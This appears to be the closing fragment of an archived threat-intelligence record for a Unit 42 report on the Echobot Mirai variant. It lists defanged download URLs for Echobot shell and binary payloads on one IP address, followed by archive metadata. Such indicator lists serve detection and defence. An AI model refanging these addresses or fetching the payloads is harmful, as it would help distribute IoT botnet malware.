Sources\r\n31.13.195[.]251/ECHOBOT.sh\r\n31.13.195[.]251/ECHO/ECHOBOT.arm\r\n31.13.195[.]251/ECHO/ECHOBOT.arm5\r\n31.13.195[.]251/ECHO/ECHOBOT.arm6\r\n31.13.195[.]251/ECHO/ECHOBOT.arm7\r\n31.13.195[.]251/ECHO/ECHOBOT.m68k\r\n31.13.195[.]251/ECHO/ECHOBOT.mips\r\n31.13.195[.]251/ECHO/ECHOBOT.mpsl\r\n31.13.195[.]251/ECHO/ECHOBOT.ppc\r\n31.13.195[.]251/ECHO/ECHOBOT.sh4\r\n31.13.195[.]251/ECHO/ECHOBOT.spc\r\n31.13.195[.]251/ECHO/ECHOBOT.x86\r\nSource: https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/"
	],
	"report_names": [
		"new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices"
	],
	"threat_actors": [],
	"ts_created_at": 1775434385,
	"ts_updated_at": 1775826772,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c3e561edf834c9852ef28b08b205a04107848a78.pdf",
		"text": "https://archive.orkl.eu/c3e561edf834c9852ef28b08b205a04107848a78.txt",
		"img": "https://archive.orkl.eu/c3e561edf834c9852ef28b08b205a04107848a78.jpg"
	}
}